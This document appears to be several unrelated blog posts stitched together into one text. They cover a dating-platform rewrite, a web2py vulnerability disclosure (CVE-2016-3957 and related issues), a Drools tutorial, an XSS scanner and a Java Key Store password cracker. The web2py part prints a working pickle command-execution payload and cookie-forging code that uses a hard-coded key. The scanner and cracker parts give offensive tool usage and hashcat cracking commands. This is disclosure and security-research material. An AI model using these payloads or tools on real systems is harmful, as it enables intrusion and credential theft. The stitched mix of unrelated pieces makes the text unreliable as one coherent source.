I've been involved with World Singles for about five years now, about three and a half years as a full-time engineer. The project was a green field rewrite of a dating system the company had evolved over about a decade that, back in 2009, was running on ColdFusion 8 on Windows, and using SQL Server. The new platform soft-launched in late 2011 as we migrated a few small sites across and our full launch - migrating millions of members in the process - was May 2012. At that point we switched from "build" mode to "operations" mode, and today we maintain a large codebase that is a combination of CFML and Clojure, running on Railo 4.2 on Linux, and using MySQL and MongoDB, running partly in our East Coast data center and partly on Amazon.

Like all projects, it's had some ups and downs, but overall it's been great: I love my team, we love working with Clojure, and we have a steady stream of interesting problems to solve, working with a large user base, on a multi-tenant, multi-lingual platform that generates millions of records of data every day. It's a lot of fun. And we all get to work from home.

Sometimes it's very enlightening to look back at the beginning of a project to see how things got set up and how we started down the path that led to where we are today. In this post, I'm going to talk about the first ten tickets we created as we kicked the project off. Eleven if you include ticket "zero".

  • #0 - Choose a bug tracking / ticketing system. We chose Unfuddle. It's clean and simple. It's easy to use. It provides Git (and SVN) hosting. It provides notebooks (wikis), ticketing, time management, customizable "agile" task boards, collaboration with external users, and it's pleasing to the eye. I've never regretted our choice of Unfuddle (even when they did a massive overhaul of the UI and it took us a week or so to get used to the radically new ticket editing workflow!).
  • #1 - Version control. Yes, really, this was our first ticket in Unfuddle. The resolution to this ticket says:
    Selected vcs system (git), created repository in Unfuddle, and provided detailed documentation on why git, how to set it up, how to connect to the repo and how to work with git.
    And the documentation was all there in an Unfuddle notebook for the whole team. A good first step.
  • #2 - Developer image. Once we had version control setup and documented, we needed an easy way for every developer to have a full, self-contained local development environment. We had some developers on Windows, some on OS X, some on Linux, so we created a VMWare image with all the basic development tools, a database, a standardized ColdFusion installation, with Apache properly configured etc. This established a basic working practice for everyone on the team: develop and test everything locally, commit to Git, push to Unfuddle. We could then pull the latest code down to a showcase / QA server for the business team to review, whenever we or they wanted.
  • #3 - Project management system. Although we had bug tracking and wikis, we wanted to nail down how communication would work in practice. We created a project management mailing list for discussion threads. We created a notebook section in Unfuddle for documenting decisions and requirements. We decided to use Basecamp for more free-form evolution of business ideas. We agreed to use tickets in Unfuddle for all actionable work, and we settled on a Scrum-like process for day-to-day development, with short, regular sprints so we could get fast feedback from the business team, and they could easily see what progress we were making.
  • #4 - General project management. Since we had agreed to use Unfuddle for time tracking, we created a ticket against which to track project management hours that didn't fit into any actual work tickets. We used this for the first six months of the project (and logged about 300 hours against it).
  • #5 - Performance planning/tuning. This was mostly a placeholder (and initially focused on how to make a Reactor-based application perform better!). It was superseded by several more specific tickets, six months into the project. But it's one of those things we wanted on the radar early for tracking purposes.
  • #6 - Architectural planning. Like ticket #4, this was a time tracking bucket that we used for the first six months of the project.
  • #7 - Set up Continuous Integration. Yup, even before we got to our first actual coding ticket, as part of the early project setup, we wanted a Continuous Integration server. Whilst we were using ColdFusion for local development (prerelease builds of ACF9, at the time), we chose to use Railo 3.2 for the CI server so that we could ensure our code was cross-platform - we were still evaluating which engine to ultimately go to production with. The resolution of this ticket says:
    Apache / Tomcat / Railo / MySQL / Transparensee / Hudson in place. Automated test run restarts Railo, reloads the DB, reloads Transparensee, cleans the Reactor project, runs all test suites and generates test results.
    We developed an Ant script that stopped and started Railo, tore down and rebuilt the test database, using a canned dataset we created (with 1,000 random users), repopulated the search engine we use and cleaned up generated files, then ran our fledgling MXUnit test suite (and later our fledgling Selenium test suite).
  • #8 - Display About us/trust. This was our first actual code ticket. The company had selected ColdBox, ColdSpring, and Reactor as our basic frameworks (yeah, no ticket for that, it was a choice that essentially predated the project "getting started"). This ticket was to produce a first working skeleton of the application that could actually display dynamically generated pages of content from the database. We created the skeleton of the site navigation and handlers for each section as part of this ticket. The "trust" in the ticket title was about showing that we really could produce basic multilingual content dynamically and show an application architecture that worked for the business.
  • #9 - Implement resource bundles for templates. And this was also an early key requirement: so that we could support Internationalization from day one and perform Localization of each site's content easily.
  • #10 - Display appropriate template for each site. This was our other key requirement: the ability to easily skin each site differently. Like #9, this was an important proof of concept to show we could support multiple sites, in multiple languages, on a single codebase, with easy customization of page layouts, content, and even forms / questions we asked.

So that's how we got started. Bug tracking, version control, local development environment, continuous integration and the key concepts tackled first!

A reasonable question is to ask what has changed in our approach over the five years since. We're still using Unfuddle (in case you're wondering, we're up to ticket 6537 as I write this!), we're still using Git (and still loving it). Our development stack has changed, as has some of our technology.

Over time we all migrated to Macs for development so maintaining the VM image stopped being important: everyone could have the entire development stack locally. We eventually settled on Railo instead of ColdFusion (we're on Railo 4.2 now), and we added MongoDB to MySQL a couple of years ago. We added some Scala code in 2010 to tackle a problematic long-running process (that did a lot of XML transformation and publishing). We added Clojure code in 2011 for a few key processes and then replaced Scala with Clojure, and today Clojure is our primary language for all new development, often running inside Railo. We stopped using Reactor (we wrote a data mapper in Clojure that is very close to the "metal" of JDBC). Recently we stopped using MXUnit and replaced it with TestBox. We're slowly changing over from Selenium RC tests to WebDriver (powered by Clojure). We have about 20,000 lines of Clojure now and our CFML code base is holding steady at around 39,000 lines of Model and Controller CFCs and 45,000 lines of View cfm files.


          Security Issues in WEB2PY Deserialization - CVE-2016-3957        

Introduction

During a penetration test we came across an application built with the web2py framework. To compromise the target we studied web2py and found three information disclosure issues in the framework's example application, all of which can lead to remote code execution (RCE). Since the example application is enabled by default, an attacker can use the disclosed information directly to gain code execution on the system unless it has been disabled manually. The issues were assigned CVE-2016-3952, CVE-2016-3953, CVE-2016-3954 and CVE-2016-3957.

Background - the well-worn Pickle code execution

Before going any further, what exactly is a deserialization vulnerability? In essence it is object injection, and its severity depends on whether the injected object itself can trigger dangerous behavior, such as reading or writing files. Generally speaking, a successful deserialization attack needs two ingredients:

  • The attacker can control the string that the target deserializes.
  • The dangerous behavior is actually executed after deserialization. In practice this usually happens in one of two ways:
    • The dangerous behavior lives in a magic method, for example PHP's __construct, which always runs when the object is created.
    • Deserialization overwrites an existing object, so that the normal program flow produces a dangerous result.

Deserialization issues exist in every programming language, but exploiting them usually requires reading the code and piecing together a workable attack chain, which makes them harder to abuse. However, some serialization libraries also serialize program logic into the string, so an attacker can supply a self-defined object directly without any piecing together - Python's Pickle, the topic of this post, is one of them.

Here is a direct Pickle example. We create an object Malicious that executes the system command echo success and serialize it into the string "cposix\nsystem\np1\n(S'echo success'\np2\ntp3\nRp4\n.". When the victim deserializes this string, the system command is triggered and success is printed.

>>> import os
>>> import cPickle
>>> class Malicious(object):
...   def __reduce__(self):
...     return (os.system,("echo success",))
...
>>> serialize = cPickle.dumps(Malicious())
>>> serialize
"cposix\nsystem\np1\n(S'echo success'\np2\ntp3\nRp4\n."
>>> cPickle.loads(serialize)
success
0

This is the command execution risk caused by misusing Pickle for deserialization: an attacker can easily produce a serialized string containing an arbitrary command and have it executed while the victim deserializes the string.

Deserialization + attacker-controlled serialized string

The issues found here stem from web2py using Pickle to serialize its session cookies (CVE-2016-3957). Because the encryption key for the session cookie is fixed (CVE-2016-3953), an attacker can forge a malicious serialized string and trigger the command execution risk described above. The details follow.

CVE-2016-3957 [1]

If a web2py application uses cookies to store session information, then on every incoming request the content of the session cookie is read in through a function called secure_loads. [Ref]

gluon/globals.py#L846
if response.session_storage_type == 'cookie':
            # check if there is session data in cookies
            if response.session_data_name in cookies:
                session_cookie_data = cookies[response.session_data_name].value
            else:
                session_cookie_data = None
            if session_cookie_data:
                data = secure_loads(session_cookie_data, cookie_key,
                                    compression_level=compression_level)
                if data:
                    self.update(data)
            response.session_id = True

The secure_loads function is shown below. After a series of decryption steps it deserializes the decrypted content with pickle.loads, which confirms that the cookie content is processed with Pickle. [Ref]

gluon/utils.py#L200
def secure_loads(data, encryption_key, hash_key=None, compression_level=None):
    if ':' not in data:
        return None
    if not hash_key:
        hash_key = sha1(encryption_key).hexdigest()
    signature, encrypted_data = data.split(':', 1)
    actual_signature = hmac.new(hash_key, encrypted_data).hexdigest()
    if not compare(signature, actual_signature):
        return None
    key = pad(encryption_key[:32])
    encrypted_data = base64.urlsafe_b64decode(encrypted_data)
    IV, encrypted_data = encrypted_data[:16], encrypted_data[16:]
    cipher, _ = AES_new(key, IV=IV)
    try:
        data = cipher.decrypt(encrypted_data)
        data = data.rstrip(' ')
        if compression_level:
            data = zlib.decompress(data)
        return pickle.loads(data)  # <-- Bingo!!!
    except Exception, e:
        return None

Therefore, if an attacker knows the encryption_key used to encrypt the cookie content, they can forge a session cookie and achieve remote command execution through pickle.loads.

CVE-2016-3953

Fortunately for us, the example application that web2py enables by default uses session cookies, and it has a hard-coded key: yoursecret. [Ref]

applications/examples/models/session.py
session.connect(request,response,cookie_key='yoursecret')

So, if a web2py user has not manually disabled the example application, an attacker can attack the http://[target]/examples/ pages directly and take control of the host.
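
Forging the cookie can be sketched roughly as follows (illustrative only, for the long-since patched default configuration; gluon.utils also provides secure_dumps, the counterpart of the secure_loads quoted above):

import os
from gluon.utils import secure_dumps

class Sleep(object):
    def __reduce__(self):
        # executed by pickle.loads() inside secure_loads() on the server
        return (os.system, ("sleep 3",))

forged = secure_dumps(Sleep(), 'yoursecret')   # the hard-coded cookie_key
print(forged)  # place this value in the session data cookie of the /examples app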

Proof of Concept

We tried forging a valid session cookie using yoursecret as the encryption_key and embedding an object that executes the system command sleep. Sending requests with this session cookie to the example application on the official web2py site (http://www.web2py.com/examples) gave the following results:

When the injected object executes the command sleep 3, the site takes 6.8 seconds to respond

POC1

When the injected object executes the command sleep 5, the site takes 10.8 seconds to respond

POC2

The response time indeed varies with the injected session cookie value, proving that the site really executed (twice) the content of our forged object. [2]

Other disclosures leading to RCE

In addition, in order to demonstrate the framework's features, the web2py example application exposes many environment variables. Two of them are particularly sensitive and indirectly lead to remote command execution as well, as described below.

CVE-2016-3954

On the page http://[target]/examples/simple_examples/status, the response tab discloses the session_cookie_key value. This is exactly the value used to encrypt the session cookie described above; combined with the CVE-2016-3957 Pickle issue it allows direct remote command execution.

CVE-2016-3954

Whether the user has changed the session_cookie_key themselves or the value was generated randomly by the system, this page still exposes the sensitive information needed to do damage.

CVE-2016-3952

The page http://[target]/examples/template_examples/beautify discloses the system environment variables. When the standalone version is used, the administrator password shows up among these variables. This password grants access to the http://[target]/admin management interface, which conveniently provides functionality to execute arbitrary commands.

CVE-2016-3952

Official fix

Version 2.14.1 removes the leaked environment variables. [Ref]

Version 2.14.2 uses a non-fixed string as the session_cookie_key and removes the disclosing pages.

applications/examples/models/session.py
from gluon.utils import web2py_uuid
cookie_key = cache.ram('cookie_key',lambda: web2py_uuid(),None)
session.connect(request,response,cookie_key=cookie_key)

Summary

The web2py framework enables an example application by default at http://[target]/examples/.
Because this application uses Pickle to handle its serialized session cookie, and because the encryption key is hard-coded as yoursecret, anyone can tamper with the session cookie content and mount a Pickle command execution attack.
The example application's pages also disclose the session_cookie_key and the administrator password, both of which lead to arbitrary command execution. Beyond that, the application leaks plenty of system configuration, paths and other information that could be used for further attacks.
All of the disclosures are fixed as of version 2.14.2, but the best solution is of course to disable the example application altogether.

Finally, the key points developers should take away from this case:

  1. Handle serialized strings with care: if users can change the string value, unexpected malicious objects can be injected, with malicious results.
  2. Remember to remove any development-related configuration from production systems.

Timeline

  • 2016/03/08 Issues discovered, further research
  • 2016/03/09 Reported upstream via a GitHub issue
  • 2016/03/15 Established email contact with the developers
  • 2016/03/15 Upstream fixed the administrator password disclosure (CVE-2016-3952)
  • 2016/03/25 Upstream fixed the remaining vulnerabilities and released version 2.14.2

Notes

  1. Strictly speaking, CVE-2016-3957 is not an insecure design in itself. While communicating with the CVE team we noticed that web2py had started replacing Pickle with JSON [Ref], which was taken to mean that web2py considered the current design inappropriate, hence this CVE ID. The project later switched back to Pickle for its own reasons, but as long as the encryption key is not disclosed this is already safe.

  2. In a self-hosted web2py environment the payload only executes once; we did not dig into why the official web2py site executed it twice.


          When refactoring does not help        
Part of a messaging application I'm working on contains a complex piece of code. This part decides, on the basis of content and recipients, who is to receive an incoming message.
for (BusRoute route: busRoutes){
  if (route.isMatching(report)){
    for(MessageFilter filter: messageFilters){
      if (filter instanceof DelayOnBusRouteMessageFilter){
        DelayOnBusRouteMessageFilter delayFilter = (DelayOnBusRouteMessageFilter)filter;
        if (delayFilter.getBusRoute().equals(route)){
          if (route.isApproachingRoutePoint(report, delayFilter)){
            if (delayFilter.getDelayApproachingThreshold() < threshold || threshold == 0){
              threshold = delayFilter.getDelayApproachingThreshold();
              deltaThreshold = delayFilter.getDeltaThreshold();
              ....
            else....
             ...
          else ...
What's wrong with this code? Being overly complicated, it is difficult to test and maintain, and it will almost certainly contain multiple errors; i.e., it is very difficult to verify that this piece of code indeed implements the specified requirements of what this part of the application is supposed to do. Trying to refactor it to bring down the cyclomatic complexity (McCabe index - counts separate execution paths) didn't help much. I was looking for other ways to improve code quality when I remembered using a rule engine to implement business rules for a proof of concept some years back. Rule engines are good when you can write declarative rules and want to externalize business rules, or when the rules must be dynamically modifiable at runtime. Working with a rule engine requires a different way of thinking compared to OO or even functional programming. Some understanding of the rule engine basics is necessary before we go on.


Rule engine basics
Most rule engines are based on the Rete algorithm, which is a matching algorithm in modern forward-chaining inferencing rules engines. Without going into details, in contrast to naïve implementations which loop over each rule and check for matching conditions, the Rete algorithm builds a network of nodes, where each node corresponds to a pattern occurring in the condition part of a rule. A rule is defined with a condition (when) part and a consequence (then) part:
rule "my very simple first rule"
 when
  Person(age > 30 && < 40 || hair == "black")
 then
   retract(p)
In the condition part you access field constraints of the facts present in the rule engine's working memory, f.i. to match all persons between 30 and 40 years of age or with black hair. Then in the consequence part you put the actions to execute when this rule's condition evaluates to true and the rule is executed, f.i. the selected person is retracted from the rule engine's working memory. The normal sequence of interactions with a rule engine is as follows:
  1. insert all facts
  2. fire all rules
  3. retrieve the results
Facts are represented by object instances; for the example above we would have a Person object with an int property age and a String property hair. In the first step we insert each fact into the working memory of the engine, which implicitly constructs the network of matching conditions. Next we let the rule engine fire all rules against the inserted facts. The engine will put all rules whose conditions evaluate to true, in a certain order, on an agenda list and then removes and executes the first rule on the agenda, i.e. it runs the consequence (then) part of the rule. If this execution changes the working memory (retracting facts or inserting new facts), then all rules are evaluated again and a new agenda results. The engine then proceeds with the execution of the first rule on the new agenda. This process repeats itself until the agenda is empty. At that point the fire-all-rules step has finished and we proceed with retrieving the results, which can be the list of remaining facts or an arbitrary result object created or filled by a rule consequence. From the above you may have noticed that the order in which rules are put on the agenda makes a big difference. Therefore rule engines offer additional directives to group and prioritize rules as they appear on the agenda. They also offer a lot of flexibility in how you construct the condition and consequence parts: you can use the rule engine's native language or extend it with a self-written DSL. It is very important that the getters of fact objects, or any other data consulted in the conditional part of rules, must not have side effects, because of how the Rete algorithm works. Remember: only change fact data in the consequence part, and don't forget to notify the rule engine to reconsider the rule conditions when that happens.


Setting up the environment
I set out to rewrite the code as a set of rules to be executed by a rule engine. Since I'm working on a Java project, I selected Drools Expert, open source software from JBoss/Red Hat, for this task. For a .Net project you could use Microsoft BRE. The remainder of this part will focus on setting up the Eclipse IDE to write (and debug) the rules and the supporting code to use the Drools rule engine from a Java application. First we install the JBoss Tools plugin in Eclipse. This plugin gives us several rule editors, a Drools perspective, and the execution/debug facilities for Drools. Now we can create a new Drools project or convert an existing project to a Drools project. If you choose a new project, you can have sample Hello World Drools files generated, which provide a great starting point for playing around with the rule engine. The following files are generated:
  • Sample.drl
  • DroolsTest.java
rule "Hello World"
 when
  m : Message( status == Message.HELLO, myMessage : message )
 then
  System.out.println( myMessage ); 
  m.setMessage( "Goodbye cruel world" );
  m.setStatus( Message.GOODBYE );
  update( m );
end

rule "GoodBye"
 when
  Message( status == Message.GOODBYE, myMessage : message )
 then
  System.out.println( myMessage );
end
The first rule matches any Message with status equal to HELLO. In the consequence, the message property is printed, the status of the message is changed to GOODBYE, and the message text is changed as well. Two things to notice here. First, 'm :' binds a new local variable called 'm' to the matched Message instance, and the myMessage variable is bound to the message property of that instance. The automatically created variables can be referenced in subsequent conditions or in the consequence part of the rule, like in this example. The second thing to notice is the update(m) statement, which notifies the rule engine that the Message instance was modified. This means that the engine will clear the agenda and reevaluate all rules, which sounds like a big thing but can be done very efficiently by the engine because of the Rete algorithm.
public class DroolsTest {

  public static final void main(String[] args) {
    try {
      // load up the knowledge base
      KnowledgeBase kbase = readKnowledgeBase();
      StatefulKnowledgeSession ksession = kbase.newStatefulKnowledgeSession();
      KnowledgeRuntimeLogger logger = KnowledgeRuntimeLoggerFactory.newFileLogger(ksession, "test");
      // go !
      Message message = new Message();
      message.setText("Hello World");
      message.setStatus(Message.HELLO);
      ksession.insert(message);
      ksession.fireAllRules();
      logger.close();
    } catch (Throwable t) {
      t.printStackTrace();
    }
  }

  private static KnowledgeBase readKnowledgeBase() throws Exception {
    KnowledgeBuilder kbuilder = KnowledgeBuilderFactory.newKnowledgeBuilder();
    kbuilder.add(ResourceFactory.newClassPathResource("Sample.drl"), ResourceType.DRL);
    KnowledgeBuilderErrors errors = kbuilder.getErrors();
    if (errors.size() > 0) {
      for (KnowledgeBuilderError error : errors) {
        System.err.println(error);
      }
      throw new IllegalArgumentException("Could not parse knowledge.");
    }
    KnowledgeBase kbase = KnowledgeBaseFactory.newKnowledgeBase();
    kbase.addKnowledgePackages(kbuilder.getKnowledgePackages());
    return kbase;
  }

  public static class Message {
    public static final int HELLO = 0;
    public static final int GOODBYE = 1;
    private String message;
    private int status;
    getters and setters ...
  }
}
The following picture shows the audit logging after execution of the program. The audit log is a tremendous help in understanding how rules are executed.
Audit logging (click to enlarge)
The Message object is inserted, which results in the creation of an activation (the rule is placed on the agenda). This line of logging is the result of the line ksession.insert(message) in main(). Next the program calls fireAllRules(). This will execute the first activation on the agenda, i.e. the Hello World rule. The activation is executed (i.e. the consequence part of the rule is executed), which creates an activation of the GoodBye rule. Then the GoodBye rule activation is executed, which completes the run because there are no activations left on the agenda.

Conclusion
Now we have some understanding of how a rule engine works. I've managed to apply this technology to resolve our complexity problem in the messaging application. The resulting rule files are small and concise, and they are easily maintainable because there is a clear relation to the functional requirements.
Dependency injection (Spring, CDI) gave us the ability to create applications with loosely coupled components. A rule engine can help us improve the internal logic of components in specific spots where complex if..then constructions make maintenance a hell of a job.
          Portland print dialog explained        

KDE Project:

No, the Portland Print Dialog isn't about design by committee. It's about letting the platform provide the print dialog (as opposed to the toolkit). If you run a GNOME desktop that will probably mean a Gtk print dialog. If you run a KDE desktop that will probably be a dialog based on KDEPrint. Incidentally, there already is a Portland file dialog, and no, it isn't designed by committee either (give it a try!).

To make these kinds of dialogs really viable as a platform service there are still some barriers that need to be climbed. In particular it will need to be possible to extend such a dialog in a toolkit-neutral and out-of-process way. That's currently not possible. I hope that we will be able to present a proof of concept of such an extensible dialog sometime later this year. Until that happens it is indeed highly premature to talk about any of this in an LSB context.

Most of the other functionality currently provided by Portland's xdg-utils will be ready well in time for LSB 3.2 though. So there are enough other interesting Portland bits to talk about on LSB day 2!


          XSStrike v1.2 - Fuzz, Crawl and Bruteforce Parameters for XSS        

XSStrike is a python script designed to detect and exploit XSS vulnerabilites.
A list of features XSStrike has to offer:
  • Fuzzes a parameter and builds a suitable payload
  • Bruteforces parameters with payloads
  • Has an inbuilt crawler like functionality
  • Can reverse engineer the rules of a WAF/Filter
  • Detects and tries to bypass WAFs
  • Both GET and POST support
  • Most of the payloads are hand crafted
  • Negligible number of false positives
  • Opens the POC in a browser window

Installing XSStrike

Use the following command to download it
git clone https://github.com/UltimateHackers/XSStrike/
After downloading, navigate to XSStrike directory with the following command
cd XSStrike
Now install the required modules with the following command
pip install -r requirements.txt
Now you are good to go! Run XSStrike with the following command
python xsstrike

Using XSStrike


You can enter your target URL now but remember, you have to mark the most crucial parameter by inserting "d3v<" in it.
For example: target.com/search.php?q=d3v&category=1
After you enter your target URL, XSStrike will check if the target is protected by a WAF or not. If its not protected by WAF you will get three options

1. Fuzzer: It checks how the input gets reflected in the webpage and then tries to build a payload according to that.


2. Striker: It bruteforces all the parameters one by one and generates the proof of concept in a browser window.


3. Spider: It extracts all the links present in homepage of the target and checks parameters in them for XSS.


4. Hulk: Hulk uses a different approach: it doesn't care about the reflection of input. It has a list of polyglots and solid payloads; it just enters them one by one in the target parameter and opens the resulting URL in a browser window.



XSStrike can also bypass WAFs


XSStrike supports POST method too


You can also supply cookies to XSStrike


Demo video


Credits
XSStrike uses code from BruteXSS, Intellifuzzer-XSS and XsSCan.


Download XSStrike

          JKS Private Key Cracker - Cracking passwords of private key entries in a JKS file         

The Java Key Store (JKS) is the Java way of storing one or several cryptographic private and public keys for asymmetric cryptography in a file. While there are various key store formats, Java and Android still default to the JKS file format. JKS is one of the file formats for Java key stores, but JKS is confusingly used as the acronym for the general Java key store API as well. This project includes information regarding the security mechanisms of the JKS file format and how the password protection of the private key can be cracked. Due to the unusual design of JKS, the developed implementation can ignore the key store password and crack the private key password directly. Because it ignores the key store password, this implementation can attack every JKS configuration, which is not the case with most other tools. By exploiting a weakness of the Password Based Encryption scheme for the private key in JKS, passwords can be cracked very efficiently. Until now, no public tool was available exploiting this weakness. This technique was implemented in hashcat to amplify the efficiency of the algorithm with higher cracking speeds on GPUs.
To get the theory part, please refer to the POC||GTFO article "15:12 Nail in the Java Key Store Coffin" in issue 0x15 included in this repository (pocorgtfo15.pdf) or available on various mirros like this beautiful one: https://unpack.debug.su/pocorgtfo/
Before you ask: JCEKS or BKS or any other Key Store format is not supported (yet).
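
To see why checking a guess is so cheap, here is a minimal sketch (my own illustration based on the article, not this repository's code): JKS derives the XOR keystream as chained SHA-1 over the UTF-16BE password and a 20-byte salt, and a correctly decrypted PKCS#8 blob must start with an ASN.1 SEQUENCE byte (0x30), so a single hash per guess is enough for a first filter:

import hashlib

def quick_check(guess, salt, first_cipher_byte):
    # salt and first_cipher_byte are taken from the protected key entry
    # (JksPrivkPrepare.jar extracts this kind of material for hashcat)
    pw = guess.encode("utf-16-be")                 # JKS stores two bytes per character
    block = hashlib.sha1(pw + salt).digest()       # first 20-byte keystream block
    return (first_cipher_byte ^ block[0]) == 0x30  # plaintext must begin with SEQUENCE

A real cracker compares more bytes against the known plaintext "fingerprints" to avoid false positives, which is what the fingerprint_creation folder is about.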

How you should crack JKS files
The answer is to build your own cracking hardware for it ;). But let's be a little more practical, so the answer is to use your GPU:
[hashcat v3.6.0 ASCII-art banner]

* BLAKE2 * BLOCKCHAIN2 * DPAPI * CHACHA20 * JAVA KEYSTORE * ETHEREUM WALLET *
All you need to do is run the following command:
java -jar JksPrivkPrepare.jar your_JKS_file.jks > hash.txt
If your hash.txt ends up being empty, there is either no private key in the JKS file or you specified a non-JKS file.
Then feed the hash.txt file to hashcat (version 3.6.0 and above), for example like this:
$ ./hashcat -m 15500 -a 3 -1 '?u|' -w 3 hash.txt ?1?1?1?1?1?1?1?1?1
hashcat (v3.6.0) starting...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2026/8107 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Precompute-Init
* Not-Iterated
* Appended-Salt
* Single-Hash
* Single-Salt
* Brute-Force

Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 75c

$jksprivk$*D1BC102EF5FE5F1A7ED6A63431767DD4E1569670...8*test:POC||GTFO

Session..........: hashcat
Status...........: Cracked
Hash.Type........: JKS Java Key Store Private Keys (SHA1)
Hash.Target......: $jksprivk$*D1BC102EF5FE5F1A7ED6A63431767DD4E1569670...8*test
Time.Started.....: Tue May 30 17:41:58 2017 (8 mins, 25 secs)
Time.Estimated...: Tue May 30 17:50:23 2017 (0 secs)
Guess.Mask.......: ?1?1?1?1?1?1?1?1?1 [9]
Guess.Charset....: -1 ?u|, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 7946.6 MH/s (39.48ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4014116700160/7625597484987 (52.64%)
Rejected.........: 0/4014116700160 (0.00%)
Restore.Point....: 5505024000/10460353203 (52.63%)
Candidates.#1....: NNVGFSRFO -> Z|ZFVDUFO
HWMon.Dev.#1.....: Temp: 75c Fan: 89% Util:100% Core:1936MHz Mem:4513MHz Bus:1

Started: Tue May 30 17:41:56 2017
Stopped: Tue May 30 17:50:24 2017
So from this repository you basically only need the JksPrivkPrepare.jar to run a cracking session.

Other things in this repository
  • test_run.sh: A little test script that you should be able to run after a couple of minutes to see this project in action. It includes comments on how to setup the dependencies for this project.
  • benchmarking: tests that show why you should use this technique and not others. Please read the "Nail in the JKS coffin" article.
  • example_jks: generate example JKS files
  • fingerprint_creation: Every plaintext private key in PKCS#8 has its own "fingerprint" that we expect when we guess the correct password. These fingerprints are necessary to make sure we are able to detect when we guessed the correct password. Please read the "Nail in the JKS coffin" article. This folder has the code to generate these fingerprints; it's a little bit hacky, but I don't expect that it will ever be necessary to add any other fingerprints.
  • JksPrivkPrepare: The source code that reads the JKS files and calculates the hash we need to give to hashcat.
  • jksprivk_crack.py: A proof of concept implementation that can be used instead of hashcat. Obviously this is much slower than hashcat, but it can outperform John the Ripper (JtR) in certain cases. Please read the "Nail in the JKS coffin" article.
  • jksprivk_decrypt.py: A little helper script that can be used to extract a private key once the password was correctly guessed.
  • run_example_jks.sh: A script that runs JksPrivkPrepare.jar and jksprivk_crack.py on all example JKS files in the example_jks folder. Make sure you run the generate_examples.py script in example_jks first.

Related work and further links
A big shout-out goes to Casey Marshall, who wrote the JKS.java class, which is used in a modified version in this project:
/* JKS.java -- implementation of the "JKS" key store.
Copyright (C) 2003 Casey Marshall <rsdio@metastatic.org>

Permission to use, copy, modify, distribute, and sell this software and
its documentation for any purpose is hereby granted without fee,
provided that the above copyright notice appear in all copies and that
both that copyright notice and this permission notice appear in
supporting documentation. No representations are made about the
suitability of this software for any purpose. It is provided "as is"
without express or implied warranty.

This program was derived by reverse-engineering Sun's own
implementation, using only the public API that is available in the 1.4.1
JDK. Hence nothing in this program is, or is derived from, anything
copyrighted by Sun Microsystems. While the "Binary Evaluation License
Agreement" that the JDK is licensed under contains blanket statements
that forbid reverse-engineering (among other things), it is my position
that US copyright law does not and cannot forbid reverse-engineering of
software to produce a compatible implementation. There are, in fact,
numerous clauses in copyright law that specifically allow
reverse-engineering, and therefore I believe it is outside of Sun's
power to enforce restrictions on reverse-engineering of their software,
and it is irresponsible for them to claim they can. */
Various other links and resources are mentioned in the article as well.
Neighborly greetings go out to atom, vollkorn, cem, doegox, corkami, xonox and rexploit for supporting this research in one form or another!


Download JKS-private-key-cracker-hashcat

          Comment on Proof of Concept: Running Web Applications in Docker Containers on Virtual Machines on my PC by John        
Update: Since I have shifted into a new paradigm where I probably won't need to be using a virtual machine to run test servers any more, I decided to run Docker on an Ubuntu Desktop virtual machine which can then host the Docker Containers for each server that I want to test. After the installation, I had some problems getting the sound to work on the virtual machine but managed to find a fix for that here: https://communities.vmware.com/thread/463323
          Cypher – Pythonic ransomware proof of concept        
none
          Case Study – Performance Testing for Large XBRL Instance Processing        
Using the Bank of Indonesia as a case study, the XII Best Practices Board has published a guidance document on the proof of concept methodology to measure the performance of an XBRL processing engine when handling large instances. Read the case study here: Large Instance Processing – Bank Indonesia
          Screencasting (Proof of Concept)        
Inspired by the awesome ways in which Andy Rundquist has been using screencasts with his students (here, here and here), I decided to try to adopt this technique with my small class of six AP Physics students this year. I’ve always likened grading to a strange form of archeology, one in which the teacher works […]
          Day 17 – Testing in virtual time        
Over the last month, most of my work time has been spent building a proof of concept for a project that I’ll serve as architect for next year. When doing software design, I find spikes (time-boxed explorations of problems) and rapid prototyping really useful ways to gain knowledge of new problem spaces that I will … Continue reading Day 17 – Testing in virtual time
          5 in 5 Vizualization 2 - Generating a d3.js visualization from a SQL Developer HTML report...        

This second visualization is more of a workflow proof of concept than a novel visualization, but I can guarantee you haven't seen the SCOTT.EMP table like this before. I have wanted to combine my two favorite tools for a while. Here is how you can drive a d3.js visualization directly from a SQL Developer custom report.

d3.js is a powerful graphing library. d3.js's superpower is that it can bind data elements behind the scenes to graphical elements in a canvas. Familiarity with HTML, JavaScript, and CSS is helpful but not required. Before I started working with d3 my JavaScript knowledge consisted of how to set focus on a page and simple text field validations. Check out Scott Murray's fantastic book and website for a gentle introduction to getting things done with d3.

SQL Developer is a leading free database query and administration tool from Oracle.

Why would you want to combine them? Two great tastes that taste great together? Well, here is my dilemma. I'm a DBA. I connect to databases hundreds of times in the course of a month to check on things. Traditionally, serving up fancy graphs using HTML pages and JavaScript libraries is the domain of the server-side programmer. While I have plenty of experience playing that role, it doesn't fit with my current workflow. Instead of a server somewhere else being the 'hub' with all the server-side smarts, I need to be able to pivot between different environments in a lightweight fashion - I can't install, nor would I want to install, a perl/python/php environment on every DB server where I wanted to produce some graphs.

So here is a way to leverage SQL Developer's features to grab the data for us. We will create a shell of an HTML doc which can be used to create a custom graphic in d3.js. And we can share this with our friends pretty easily - no server-side knowledge or admin privileges required.

Research

Looking at data for this POC I zeroed in on one of my favorite relationships - hierarchical relationships. These are all over the place in the data we work with day to day. There are some convenient ways to work with the data, like Parent/Child or Drill Down reports. The problem is these often break down after your data is one or two levels deep. This is great for, say, showing records on each side of an FK relationship, but what about when you want to see the SCOTT.EMP.MGR hierarchy from King all the way down to every employee? You have to do some CONNECT BY LEVEL magic and you still have to deal with some tabular output oddness.

Data Organization

select (SELECT ENAME FROM EMP WHERE EMPNO=E.MGR) AS MGR_ENAME, 
       ENAME 
  FROM EMP E 
 WHERE MGR IS NOT NULL;

This returns 13 rows. Order is not important here; the code that accepts this data will make the connections as they are introduced to the graphic.
